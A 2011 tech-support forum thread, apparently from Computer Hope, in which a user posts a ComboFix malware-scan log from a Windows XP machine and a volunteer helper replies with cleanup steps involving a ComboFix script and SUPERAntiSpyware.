Here's the "blimmin" long log from Combo. Would someone be kind enough to have a quick glance and see if you think l have any issues that need resolving?
NB: I noticed mentions somewhere in there of AVG and IOBIT but l thought l had deleted these?
Anyway, thank you.

ComboFix 11-06-15.01 - briann 15/06/2011 17:41:19.1.1 - x86
Microsoft Windows XP Home Edition 5.1.2600.3.1252.44.1033.18.3327.2726 [GMT 2:00]
Running from: c:\documents and settings\briann\Desktop\ComboFix.exe
AV: avast! Antivirus *Disabled/Updated* {7591DB91-41F0-48A3-B128-1A293FD8233D}
AV: Microsoft Security Essentials *Disabled/Updated* {BCF43643-A118-4432-AEDE-D861FCBCFCDF}
FW: AVG Firewall *Disabled* {8decf618-9569-4340-b34a-d78d28969b66}
.
ADS - WINDOWS: deleted 24 bytes in 1 streams.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\documents and settings\briann\Application Data\briannlog.dat
c:\documents and settings\briann\Application Data\EurekaLog
c:\documents and settings\briann\Application Data\inst.exe
c:\documents and settings\briann\Application Data\OfferBox
c:\documents and settings\briann\Application Data\OfferBox\config.xml
c:\documents and settings\briann\WINDOWS
.
.
((((((((((((((((((((((((( Files Created from 2011-05-15 to 2011-06-15 )))))))))))))))))))))))))))))))
.
.
2011-06-15 06:11 . 2011-06-15 06:11--------d-----w-c:\windows\LastGood
2011-06-12 22:56 . 2011-06-12 22:56--------d-----w-c:\documents and settings\All Users\Application Data\IObit
2011-06-12 22:55 . 2011-06-12 22:57--------d-----w-c:\documents and settings\briann\Application Data\IObit
2011-06-11 22:28 . 2011-06-11 22:28--------d-----w-c:\documents and settings\briann\Application Data\SUPERAntiSpyware.com
2011-06-11 22:28 . 2011-06-11 22:28--------d-----w-c:\program files\SUPERAntiSpyware
2011-06-11 06:05 . 2011-06-11 06:05404640----a-w-c:\windows\system32\FlashPlayerCPLApp.cpl
2011-06-07 17:44 . 2011-06-07 17:44--------d-----w-c:\documents and settings\briann\Application Data\Rovio
2011-06-06 09:22 . 2011-05-10 12:03307928----a-w-c:\windows\system32\drivers\aswSP.sys
2011-06-06 09:22 . 2011-05-10 11:5919544----a-w-c:\windows\system32\drivers\aswFsBlk.sys
2011-06-06 09:22 . 2011-05-10 12:03441176----a-w-c:\windows\system32\drivers\aswSnx.sys
2011-06-06 09:22 . 2011-05-10 12:0249240----a-w-c:\windows\system32\drivers\aswTdi.sys
2011-06-06 09:22 . 2011-05-10 11:5925432----a-w-c:\windows\system32\drivers\aswRdr.sys
2011-06-06 09:22 . 2011-05-10 12:02102616----a-w-c:\windows\system32\drivers\aswmon2.sys
2011-06-06 09:22 . 2011-05-10 12:0296344----a-w-c:\windows\system32\drivers\aswmon.sys
2011-06-06 09:22 . 2011-05-10 11:5930808----a-w-c:\windows\system32\drivers\aavmker4.sys
2011-06-06 09:22 . 2011-05-10 12:1040112----a-w-c:\windows\avastSS.scr
2011-06-06 09:22 . 2011-05-10 12:10199304----a-w-c:\windows\system32\aswBoot.exe
2011-06-06 09:22 . 2011-06-06 09:22--------d-----w-c:\program files\AVAST Software
2011-06-05 21:48 . 2011-06-05 21:48--------d-----w-c:\documents and settings\briann\Application Data\A0261641-01B1-467E-9DE5-2FFFBF73C059
2011-06-02 19:02 . 2011-06-02 19:02--------d-----w-c:\documents and settings\briann\Application Data\AVG10
2011-06-02 19:00 . 2011-06-02 19:00--------d--h--w-c:\documents and settings\All Users\Application Data\Common Files
2011-06-02 18:49 . 2011-06-04 20:27--------d-----w-c:\documents and settings\All Users\Application Data\AVG10
2011-06-02 18:48 . 2011-06-04 20:27--------d-----w-c:\documents and settings\All Users\Application Data\MFAData
2011-05-29 17:25 . 2011-05-29 17:25--------d-----w-C:\DVDVideoSoft
2011-05-19 15:46 . 2011-05-19 15:46--------d-----w-c:\windows\system32\wbem\Repository
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2011-06-05 21:48 . 2011-05-08 21:19167968----a-w-c:\windows\system32\drivers\afcdp.sys
2011-06-05 21:48 . 2011-05-08 21:19752128----a-w-c:\windows\system32\drivers\tdrpm273.sys
2011-06-05 21:48 . 2011-01-24 18:32600928----a-w-c:\windows\system32\drivers\timntr.sys
2011-05-29 07:11 . 2010-10-06 15:0739984----a-w-c:\windows\system32\drivers\mbamswissarmy.sys
2011-05-29 07:11 . 2010-10-06 15:0722712----a-w-c:\windows\system32\drivers\mbam.sys
2011-05-08 21:19 . 2011-01-24 18:32170528----a-w-c:\windows\system32\drivers\snapman.sys
2011-03-30 18:38 . 2011-03-30 18:3828752----a-w-c:\documents and settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{E3544FD3-0E42-4B6D-875F-784AE3705A58}\MpKsla6a28098.sys
2011-03-30 18:32 . 2011-03-30 18:3228752----a-w-c:\documents and settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{E3544FD3-0E42-4B6D-875F-784AE3705A58}\MpKsl09f40d0c.sys
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\00avast]
@="{472083B0-C522-11CF-8763-00608CC02F24}"
[HKEY_CLASSES_ROOT\CLSID\{472083B0-C522-11CF-8763-00608CC02F24}]
2011-05-10 12:10122512----a-w-c:\program files\AVAST Software\Avast\ashShell.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2010-10-29 249064]
"Malwarebytes' Anti-Malware"="c:\program files\Malwarebytes' Anti-Malware\mbamgui.exe" [2011-05-29 449584]
"avast"="c:\program files\AVAST Software\Avast\avastUI.exe" [2011-05-10 3459712]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"EnableLinkedConnections"= 1 (0x1)
.
[hkey_local_machine\software\microsoft\windows\currentversion\explorer\ShellExecuteHooks]
"{5AE067D3-9AFB-48E0-853A-EBB7F4A000DA}"= "c:\program files\SUPERAntiSpyware\SASSEH.DLL" [2008-05-13 77824]
.
[HKLM\~\startupfolder\C:^Documents and Settings^All Users^Start Menu^Programs^Startup^HP Digital Imaging Monitor.lnk]
backup=c:\windows\pss\HP Digital Imaging Monitor.lnkCommon Startup
.
[HKLM\~\startupfolder\C:^Documents and Settings^briann^Start Menu^Programs^Startup^Secunia PSI.lnk]
backup=c:\windows\pss\Secunia PSI.lnkStartup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Acronis Scheduler2 Service]
2011-02-01 17:53390720----a-w-c:\program files\Common Files\Acronis\Schedule2\schedhlp.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\C-Media Mixer]
2002-10-15 16:001818624----a-w-c:\windows\mixer.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HP Software Update]
2007-10-14 19:1749152----a-w-c:\program files\HP\HP Software Update\hpwuSchd2.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\hpqSRMon]
2008-08-20 09:54150016----a-w-c:\program files\HP\Digital Imaging\bin\HpqSRmon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\MSMSGS]
2008-04-14 12:421695232--sh--w-c:\program files\Messenger\msmsgs.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RTHDCPL]
2009-10-06 08:3418750976----a-w-c:\windows\RTHDCPL.EXE
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SAOB Monitor]
2011-05-10 16:572536440----a-w-c:\program files\Acronis\TrueImageHome\OnlineBackupStandalone\TrueImageMonitor.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\StartCCC]
2009-09-19 04:2598304----a-w-c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SunJavaUpdateSched]
2010-10-29 12:49249064----a-w-c:\program files\Common Files\Java\Java Update\jusched.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SUPERAntiSpyware]
2011-06-10 16:262424192----a-w-c:\program files\SUPERAntiSpyware\SUPERAntiSpyware.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TrueImageMonitor.exe]
2011-05-17 20:135550792----a-w-c:\program files\Acronis\TrueImageHome\TrueImageMonitor.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\services]
"Secunia Update Agent"=2 (0x2)
"Secunia PSI Agent"=2 (0x2)
"Ati HotKey Poller"=2 (0x2)
"JavaQuickStarterService"=2 (0x2)
"AcrSch2Svc"=2 (0x2)
.
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"%windir%\\system32\\sessmgr.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqtra08.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqste08.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hposid01.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpiscnapp.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqkygrp.exe"=
"c:\\Program Files\\Spotify\\spotify.exe"=
"c:\\Program Files\\Java\\jre6\\bin\\javaw.exe"=
"c:\\Program Files\\DC++\\DCPlusPlus.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqpse.exe"=
"c:\\Program Files\\Common Files\\HP\\Digital Imaging\\bin\\hpqPhotoCrm.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqsudi.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqpsapp.exe"=
"c:\\Program Files\\TeamViewer\\Version6\\TeamViewer.exe"=
"c:\\Program Files\\TeamViewer\\Version6\\TeamViewer_Service.exe"=
.
R0 tdrpman273;Acronis Try&DECIDE and Restore Points filter (build 273);c:\windows\system32\drivers\tdrpm273.sys [08/05/2011 23:19 752128]
R1 aswSnx;aswSnx;c:\windows\system32\drivers\aswSnx.sys [06/06/2011 11:22 441176]
R1 aswSP;aswSP;c:\windows\system32\drivers\aswSP.sys [06/06/2011 11:22 307928]
R1 SASDIFSV;SASDIFSV;c:\program files\SUPERAntiSpyware\sasdifsv.sys [17/02/2010 20:25 12872]
R1 SASKUTIL;SASKUTIL;c:\program files\SUPERAntiSpyware\SASKUTIL.SYS [10/05/2010 20:41 67656]
R2 afcdpsrv;Acronis Nonstop Backup Service;c:\program files\Common Files\Acronis\CDP\afcdpsrv.exe [08/05/2011 23:19 3246040]
R2 aswFsBlk;aswFsBlk;c:\windows\system32\drivers\aswFsBlk.sys [06/06/2011 11:22 19544]
R2 MBAMService;MBAMService;c:\program files\Malwarebytes' Anti-Malware\mbamservice.exe [06/10/2010 17:07 366640]
R3 afcdp;afcdp;c:\windows\system32\drivers\afcdp.sys [08/05/2011 23:19 167968]
R3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [06/10/2010 17:07 22712]
S1 MpKsl27aa9cbe;MpKsl27aa9cbe;\??\c:\documents and settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{5CBE358E-FB9E-42B0-91C3-0ED11A46499B}\MpKsl27aa9cbe.sys --> c:\documents and settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{5CBE358E-FB9E-42B0-91C3-0ED11A46499B}\MpKsl27aa9cbe.sys [?]
S1 MpKsl4965f692;MpKsl4965f692;\??\c:\documents and settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{B94C2A1F-2A70-45B2-8BDB-24A63750906F}\MpKsl4965f692.sys --> c:\documents and settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{B94C2A1F-2A70-45B2-8BDB-24A63750906F}\MpKsl4965f692.sys [?]
S1 MpKsl82abaab5;MpKsl82abaab5;\??\c:\documents and settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{F553CFB7-36B1-404E-8DC1-3F6E5D6A268A}\MpKsl82abaab5.sys --> c:\documents and settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{F553CFB7-36B1-404E-8DC1-3F6E5D6A268A}\MpKsl82abaab5.sys [?]
S1 MpKsla6a28098;MpKsla6a28098;c:\documents and settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{E3544FD3-0E42-4B6D-875F-784AE3705A58}\MpKsla6a28098.sys [30/03/2011 20:38 28752]
S2 KMService;KMService;c:\windows\system32\srvany.exe [21/11/2010 02:33 8192]
S3 Ambfilt;Ambfilt;c:\windows\system32\drivers\Ambfilt.sys [06/10/2010 16:44 1684736]
S3 appliandMP;appliandMP;


S3 MSICDSetup;MSICDSetup;\??\d:\cdriver.sys --> d:\CDriver.sys [?]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
HPZ12REG_MULTI_SZ Pml Driver HPZ12 Net Driver HPZ12
hpdevmgmtREG_MULTI_SZ hpqcxs08 hpqddsvc
.
Contents of the 'Scheduled Tasks' folder
.
2011-03-30 c:\windows\Tasks\RealUpgradeLogonTaskS-1-5-21-861567501-1035525444-682003330-1004.job
- c:\program files\Real\RealUpgrade\realupgrade.exe [2010-06-03 01:02]
.
2011-06-10 c:\windows\Tasks\RealUpgradeScheduledTaskS-1-5-21-861567501-1035525444-682003330-1004.job
- c:\program files\Real\RealUpgrade\realupgrade.exe [2010-06-03 01:02]
.
2011-06-15 c:\windows\Tasks\User_Feed_Synchronization-{12FB04A5-A76E-4C86-A1A2-0A1F5DA00FA1}.job
- c:\windows\system32\msfeedssync.exe [2009-03-08 02:31]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://portail.free.fr/
Trusted Zone: dailymail.co.uk\www
Trusted Zone: telegraph.co.uk\puzzles
TCP: DhcpNameServer = 212.27.40.240 212.27.40.241
.
- - - - ORPHANS REMOVED - - - -
.
Notify-SDWinLogon - SDWinLogon.dll
MSConfigStartUp-00PCTFW - c:\program files\PC Tools Firewall Plus\FirewallGUI.exe
MSConfigStartUp-MSSE - c:\program files\Microsoft Security Essentials\msseces.exe
MSConfigStartUp-Spybot-S&D Cleaning - c:\program files\Spybot - Search & Destroy 2\SDCleaner.exe
MSConfigStartUp-Startup Manager - c:\program files\Advanced System Optimizer\startUp manager.exe
MSConfigStartUp-TkBellExe - c:\program files\Common Files\Real\Update_OB\realsched.exe
.
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2011-06-15 17:45
Windows 5.1.2600 Service Pack 3 NTFS
.
scanning hidden processes ...
.
scanning hidden autostart entries ...
.
scanning hidden files ...
.
scan completed successfully
hidden files: 0
.
**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{3610eda5-77ef-11d2-8dc5-00c04fa31a66}]
@DACL=(02 0000)
@="Microsoft Disk Quota"
"NoMachinePolicy"=dword:00000000
"NoUserPolicy"=dword:00000001
"NoSlowLink"=dword:00000001
"NoBackgroundPolicy"=dword:00000001
"NoGPOListChanges"=dword:00000001
"PerUserLocalSettings"=dword:00000000
"RequiresSuccessfulRegistry"=dword:00000001
"EnableAsynchronousProcessing"=dword:00000000
"DllName"=expand:"dskquota.dll"
"ProcessGroupPolicy"="ProcessGroupPolicy"
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{4CFB60C1-FAA6-47f1-89AA-0B18730C9FD3}]
@DACL=(02 0000)
@="Internet Explorer Zonemapping"
"DllName"="c:\\WINDOWS\\system32\\iedkcs32.dll"
"ProcessGroupPolicy"="ProcessGroupPolicyForZoneMap"
"NoGPOListChanges"=dword:00000001
"RequiresSucessfulRegistry"=dword:00000001
"DisplayName"="@c:\\WINDOWS\\system32\\iedkcs32.dll.mui,-3051"
"RequiresSuccessfulRegistry"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{7B849a69-220F-451E-B3FE-2CB811AF94AE}]
@DACL=(02 0000)
@="Internet Explorer User Accelerators"
"DisplayName"="@c:\\WINDOWS\\system32\\iedkcs32.dll.mui,-3051"
"DllName"="c:\\WINDOWS\\system32\\iedkcs32.dll"
"NoGPOListChanges"=dword:00000001
"ProcessGroupPolicy"="ProcessGroupPolicyForActivities"
"ProcessGroupPolicyEx"="ProcessGroupPolicyForActivitiesEx"
"RequiresSuccessfulRegistry"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}]
@DACL=(02 0000)
"ProcessGroupPolicy"="SceProcessSecurityPolicyGPO"
"GenerateGroupPolicy"="SceGenerateGroupPolicy"
"ExtensionRsopPlanningDebugLevel"=dword:00000001
"ProcessGroupPolicyEx"="SceProcessSecurityPolicyGPOEx"
"ExtensionDebugLevel"=dword:00000001
"DllName"=expand:"scecli.dll"
@="Security"
"NoUserPolicy"=dword:00000001
"NoGPOListChanges"=dword:00000001
"EnableAsynchronousProcessing"=dword:00000001
"MaxNoGPOListChangesInterval"=dword:000003c0
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{A2E30F80-D7DE-11d2-BBDE-00C04F86AE3B}]
@DACL=(02 0000)
"ProcessGroupPolicyEx"="ProcessGroupPolicyEx"
"GenerateGroupPolicy"="GenerateGroupPolicy"
"ProcessGroupPolicy"="ProcessGroupPolicy"
"DllName"="c:\\WINDOWS\\system32\\iedkcs32.dll"
@="Internet Explorer Branding"
"NoSlowLink"=dword:00000001
"NoBackgroundPolicy"=dword:00000000
"NoGPOListChanges"=dword:00000001
"NoMachinePolicy"=dword:00000001
"DisplayName"="@c:\\WINDOWS\\system32\\iedkcs32.dll.mui,-3014"
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}]
@DACL=(02 0000)
"ProcessGroupPolicy"="SceProcessEFSRecoveryGPO"
"DllName"=expand:"scecli.dll"
@="EFS recovery"
"NoUserPolicy"=dword:00000001
"NoGPOListChanges"=dword:00000001
"RequiresSuccessfulRegistry"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{B587E2B1-4D59-4e7e-AED9-22B9DF11D053}]
@DACL=(02 0000)
@="802.3 Group Policy"
"DisplayName"=expand:"@dot3gpclnt.dll,-100"
"ProcessGroupPolicyEx"="ProcessLANPolicyEx"
"GenerateGroupPolicy"="GenerateLANPolicy"
"DllName"=expand:"dot3gpclnt.dll"
"NoUserPolicy"=dword:00000001
"NoGPOListChanges"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{C631DF4C-088F-4156-B058-4375F0853CD8}]
@DACL=(02 0000)
@="Microsoft Offline Files"
"DllName"=expand:"%SystemRoot%\\System32\\cscui.dll"
"EnableAsynchronousProcessing"=dword:00000000
"NoBackgroundPolicy"=dword:00000000
"NoGPOListChanges"=dword:00000000
"NoMachinePolicy"=dword:00000000
"NoSlowLink"=dword:00000000
"NoUserPolicy"=dword:00000001
"PerUserLocalSettings"=dword:00000000
"ProcessGroupPolicy"="ProcessGroupPolicy"
"RequiresSuccessfulRegistry"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{c6dc5466-785a-11d2-84d0-00c04fb169f7}]
@DACL=(02 0000)
@="Software Installation"
"DllName"=expand:"appmgmts.dll"
"ProcessGroupPolicyEx"="ProcessGroupPolicyObjectsEx"
"GenerateGroupPolicy"="GenerateGroupPolicy"
"NoBackgroundPolicy"=dword:00000000
"RequiresSucessfulRegistry"=dword:00000000
"NoSlowLink"=dword:00000001
"PerUserLocalSettings"=dword:00000001
"EventSources"=multi:"(Application Management,Application)\00(MsiInstaller,Application)\00\00"
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{CF7639F3-ABA2-41DB-97F2-81E2C5DBFC5D}]
@DACL=(02 0000)
@="Internet Explorer Machine Accelerators"
"DisplayName"="@c:\\WINDOWS\\system32\\iedkcs32.dll.mui,-3051"
"DllName"="c:\\WINDOWS\\system32\\iedkcs32.dll"
"NoGPOListChanges"=dword:00000001
"ProcessGroupPolicy"="ProcessGroupPolicyForActivities"
"ProcessGroupPolicyEx"="ProcessGroupPolicyForActivitiesEx"
"RequiresSuccessfulRegistry"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\!SASWinLogon]
@DACL=(02 0000)
"DllName"="c:\\Program Files\\SUPERAntiSpyware\\SASWINLO.DLL"
"Logon"="SABWINLOLogon"
"Logoff"="SABWINLOLogoff"
"Startup"="SABWINLOStartup"
"Shutdown"="SABWINLOShutdown"
"Asynchronous"=dword:00000000
"Impersonate"=dword:00000000
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtiExtEvent]
@DACL=(02 0000)
"DLLName"="Ati2evxx.dll"
"Asynchronous"=dword:00000000
"Impersonate"=dword:00000001
"Lock"="AtiLockEvent"
"Logoff"="AtiLogoffEvent"
"Logon"="AtiLogonEvent"
"Disconnect"="AtiDisConnectEvent"
"Reconnect"="AtiReConnectEvent"
"Safe"=dword:00000000
"Shutdown"="AtiShutdownEvent"
"StartScreenSaver"="AtiStartScreenSaverEvent"
"StartShell"="AtiStartShellEvent"
"Startup"="AtiStartupEvent"
"StopScreenSaver"="AtiStopScreenSaverEvent"
"Unlock"="AtiUnLockEvent"
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt32chain]
@DACL=(02 0000)
"Asynchronous"=dword:00000000
"Impersonate"=dword:00000000
"DllName"=expand:"crypt32.dll"
"Logoff"="ChainWlxLogoffEvent"
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cryptnet]
@DACL=(02 0000)
"Asynchronous"=dword:00000000
"Impersonate"=dword:00000000
"DllName"=expand:"cryptnet.dll"
"Logoff"="CryptnetWlxLogoffEvent"
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cscdll]
@DACL=(02 0000)
"DLLName"="cscdll.dll"
"Logon"="WinlogonLogonEvent"
"Logoff"="WinlogonLogoffEvent"
"ScreenSaver"="WinlogonScreenSaverEvent"
"Startup"="WinlogonStartupEvent"
"Shutdown"="WinlogonShutdownEvent"
"StartShell"="WinlogonStartShellEvent"
"Impersonate"=dword:00000000
"Asynchronous"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\dimsntfy]
@DACL=(02 0000)
"Asynchronous"=dword:00000001
"DllName"=expand:"%SystemRoot%\\System32\\dimsntfy.dll"
"Startup"="WlDimsStartup"
"Shutdown"="WlDimsShutdown"
"Logon"="WlDimsLogon"
"Logoff"="WlDimsLogoff"
"StartShell"="WlDimsStartShell"
"Lock"="WlDimsLock"
"Unlock"="WlDimsUnlock"
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\ScCertProp]
@DACL=(02 0000)
"DLLName"="wlnotify.dll"
"Logon"="SCardStartCertProp"
"Logoff"="SCardStopCertProp"
"Lock"="SCardSuspendCertProp"
"Unlock"="SCardResumeCertProp"
"Enabled"=dword:00000001
"Impersonate"=dword:00000001
"Asynchronous"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\Schedule]
@DACL=(02 0000)
"Asynchronous"=dword:00000000
"DllName"=expand:"wlnotify.dll"
"Impersonate"=dword:00000000
"StartShell"="SchedStartShell"
"Logoff"="SchedEventLogOff"
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\sclgntfy]
@DACL=(02 0000)
"Logoff"="WLEventLogoff"
"Impersonate"=dword:00000000
"Asynchronous"=dword:00000001
"DllName"=expand:"sclgntfy.dll"
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\SensLogn]
@DACL=(02 0000)
"DLLName"="WlNotify.dll"
"Lock"="SensLockEvent"
"Logon"="SensLogonEvent"
"Logoff"="SensLogoffEvent"
"Safe"=dword:00000001
"MaxWait"=dword:00000258
"StartScreenSaver"="SensStartScreenSaverEvent"
"StopScreenSaver"="SensStopScreenSaverEvent"
"Startup"="SensStartupEvent"
"Shutdown"="SensShutdownEvent"
"StartShell"="SensStartShellEvent"
"PostShell"="SensPostShellEvent"
"Disconnect"="SensDisconnectEvent"
"Reconnect"="SensReconnectEvent"
"Unlock"="SensUnlockEvent"
"Impersonate"=dword:00000001
"Asynchronous"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\termsrv]
@DACL=(02 0000)
"Asynchronous"=dword:00000000
"DllName"=expand:"wlnotify.dll"
"Impersonate"=dword:00000000
"Logoff"="TSEventLogoff"
"Logon"="TSEventLogon"
"PostShell"="TSEventPostShell"
"Shutdown"="TSEventShutdown"
"StartShell"="TSEventStartShell"
"Startup"="TSEventStartup"
"MaxWait"=dword:00000258
"Reconnect"="TSEventReconnect"
"Disconnect"="TSEventDisconnect"
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\wlballoon]
@DACL=(02 0000)
"DLLName"="wlnotify.dll"
"Logon"="RegisterTicketExpiredNotificationEvent"
"Logoff"="UnregisterTicketExpiredNotificationEven t"
"Impersonate"=dword:00000001
"Asynchronous"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
@DACL=(02 0000)
"HelpAssistant"=dword:00000000
"TsInternetUser"=dword:00000000
"SQLAgentCmdExec"=dword:00000000
"NetShowServices"=dword:00000000
"IWAM_"=dword:00010000
"IUSR_"=dword:00010000
"VUSR_"=dword:00010000
.
Completion time: 2011-06-15 17:47:46
ComboFix-quarantined-files.txt 2011-06-15 15:47
.
Pre-Run: 36,801,867,776 bytes free
Post-Run: 36,803,469,312 bytes free
.
WindowsXP-KB310994-SP2-Home-BootDisk-ENU.exe
[boot loader]
timeout=2
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
c:\cmdcons\BOOTSECT.DAT="Microsoft Windows Recovery Console" /cmdcons
UnsupportedDebug="do not select this" /debug
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Home Edition" /noexecute=optin /fastdetect
.
- - End Of File - - 2FA1A556B7F7212176187E13F8EAD57DHello and welcome to Computer HOPE Forum. My name is Dave. I will be helping you out with your particular problem on your computer.

1. I will be working on your Malware issues. This may or may not solve other issues you have with your machine.
2. The fixes are specific to your problem and should only be used for this issue on this machine.
3. If you don't know or understand something, PLEASE don't hesitate to ask.
4. Please DO NOT run any other tools or scans while I am helping you.
5. It is important that you reply to this thread. Do not start a new topic.
6. Your security programs may give warnings for some of the tools I will ask you to use. Be assured, any links I give are safe.
7. Absence of symptoms does not mean that everything is clear.

If you can't access the internet with your infected computer you will have to download and transfer any programs to the computer you're using now and transfer them to the infected computer with a CD-RW or a USB storage device. I prefer a CD because a storage device can get infected. If you use a storage device hold the shift key down while inserting the USB storage device for about 10 secs. You will also have to transfer the logs you receive back to the good computer using the same method until we can get the computer back on-line.
******************************************************
First of all, you have two AV programs running on your computer which is a no-no. Either avast! Antivirus or AV: Microsoft Security Essentials will have to be disabled/uninstalled. I would stick with MSE, if I were you.

Re-running ComboFix to remove infections:

  • Close any open browsers.
  • Close/disable all anti virus and anti malware programs so they do not interfere with the running of ComboFix.
  • Open notepad and copy/paste the text in the quotebox below into it:
    Quote
    KillAll::

    DDS::
    Trusted Zone: dailymail.co.uk\www
    Trusted Zone: telegraph.co.uk\puzzles

  • Save this as CFScript.txt, in the same location as ComboFix.exe



  • Referring to the picture above, drag CFScript into ComboFix.exe
  • When finished, it shall produce a log for you at C:\ComboFix.txt
  • I don't need to see the log from this action.
******************************************************
SUPERAntiSpyware

If you already have SUPERAntiSpyware be sure to check for updates before scanning!

Download SuperAntispyware Free Edition (SAS)
* Double-click the icon on your desktop to run the installer.
* When asked to Update the program definitions, click Yes
* If you encounter any problems while downloading the updates, manually download and unzip them from here
* Next click the Preferences button.

•Under Start-Up Options uncheck Start SUPERAntiSpyware when Windows starts
* Click the Scanning Control tab.
* Under Scanner Options make sure only the following are checked:

•Close browsers before scanning
•Scan for tracking cookies
•Terminate memory threats before quarantining
